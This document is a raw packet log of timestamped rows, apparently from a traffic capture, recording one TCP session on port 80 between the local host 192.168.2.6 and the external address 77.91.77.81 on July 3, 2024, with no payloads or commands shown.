Jul 3, 2024 18:09:07.281711102 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.281785965 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.281797886 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.281807899 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.281819105 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.281836987 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.281902075 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.303173065 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.303246021 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.303256035 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.303266048 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.303271055 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.303342104 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.303342104 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.303369045 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.303415060 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.303453922 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.303464890 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.303477049 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.303498983 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.303524017 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.303575993 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.303617954 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.303765059 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.303776979 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.303786993 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.303808928 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.303828001 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.303874016 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.303885937 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.303896904 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.303908110 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.303916931 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.303920984 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.303934097 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.303957939 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.304100037 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.304111958 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.304122925 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.304132938 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.304141045 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.304145098 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.304158926 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.304162979 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.304183006 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.304208994 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.304311037 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.304322004 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.304356098 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.304442883 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.304454088 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.304464102 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.304476023 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.304488897 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.304491997 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.304503918 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.304513931 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.304514885 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.304527044 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.304536104 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.304539919 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.304563999 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.304591894 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.304738998 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.304749966 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.304760933 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.304771900 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.304781914 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.304785013 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.304794073 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.304826975 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.304858923 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.304869890 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.304897070 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.305017948 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.305030107 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.305042028 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.305052042 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.305057049 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.305063963 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.305077076 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.305087090 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.305087090 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.305102110 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.305120945 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.305141926 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.305393934 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.305417061 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.305428028 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.305438042 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.305438995 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.305450916 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.305461884 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.305464983 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.305473089 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.305485964 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.305495024 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.305499077 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.305510998 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.305520058 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.305524111 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.305536985 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.305546999 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.305548906 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.305558920 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.305571079 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.305582047 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.305583000 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.305608034 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.305620909 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.306014061 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.306025982 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.306037903 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.306049109 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.306058884 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.306061029 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.306071997 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.306082964 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.306091070 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.306096077 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.306113958 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.306123018 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.306127071 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.306133986 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.306133986 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.306140900 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.306185961 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.326260090 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.326272011 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.326282978 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.326337099 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.326348066 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.326353073 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.326359034 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.326395988 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.326406956 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.326471090 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.326482058 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.326518059 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.326558113 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.326570034 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.326580048 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.326591015 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.326601028 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.326606035 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.326612949 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.326621056 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.326626062 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.326641083 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.326663971 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.326837063 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.326848984 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.326865911 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.326879978 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.326884031 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.326893091 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.326900005 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.326905966 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.326925039 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.326948881 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.327119112 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.327130079 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.327141047 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.327151060 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.327159882 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.327162027 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.327172995 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.327174902 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.327198982 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.327213049 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.327323914 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.327363968 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.327981949 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.327992916 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.328003883 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.328031063 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.328052044 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.328738928 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.328749895 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.328759909 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.328769922 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.328785896 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.328804970 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.372438908 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.372451067 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.372462034 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.372623920 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.372633934 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.372644901 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.372654915 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.372734070 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.372734070 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.372734070 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.393990993 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.394016027 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.394026995 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.394119024 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.394140005 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.394151926 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.394165039 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.394191027 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.394207001 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.394244909 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.394290924 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.394495010 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.394506931 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.394520044 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.394546986 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.394568920 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.394634008 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.394661903 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.394675016 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.394685984 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.394687891 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.394700050 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.394706011 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.394733906 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.394798994 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.394810915 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.394825935 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.394831896 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.394845009 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.394848108 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.394857883 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.394874096 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.394905090 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.395081043 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.395092964 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.395106077 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.395119905 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.395124912 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.395138025 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.395148993 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.395164967 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.395176888 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.395179033 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.395201921 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.395226955 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.395400047 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.395411968 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.395423889 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.395436049 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.395448923 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.395452023 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.395463943 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.395467043 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.395479918 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.395492077 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.395509005 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.395536900 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.395684958 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.395698071 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.395725012 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.395726919 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.395736933 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.395740986 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.395751953 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.395765066 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.395766020 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.395780087 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.395787001 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.395792961 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.395813942 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.395828962 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.396030903 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.396049976 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.396076918 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.396080017 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.396090031 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.396090984 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.396104097 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.396115065 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.396116972 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.396126986 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.396128893 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.396143913 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.396146059 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.396157980 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.396158934 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.396188021 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.396192074 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.396209002 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.396346092 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.396430016 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.396441936 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.396454096 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.396476984 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.396497965 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.396688938 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.396699905 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.396712065 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.396723986 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.396732092 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.396737099 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.396749973 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.396754980 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.396778107 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.396781921 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.396791935 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.396805048 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.396815062 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.396816969 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.396828890 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.396840096 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.396842957 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.396853924 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.396864891 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.396868944 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.396884918 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.396910906 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.417125940 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.417139053 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.417150974 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.417211056 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.417211056 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.417244911 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.417258024 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.417269945 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.417283058 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.417294025 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.417299986 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.417330980 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.417366982 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.417478085 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.417490005 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.417500973 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.417511940 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.417516947 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.417526007 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.417534113 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.417538881 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.417550087 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.417579889 CEST	62923	80	192.168.2.6	77.91.77.81
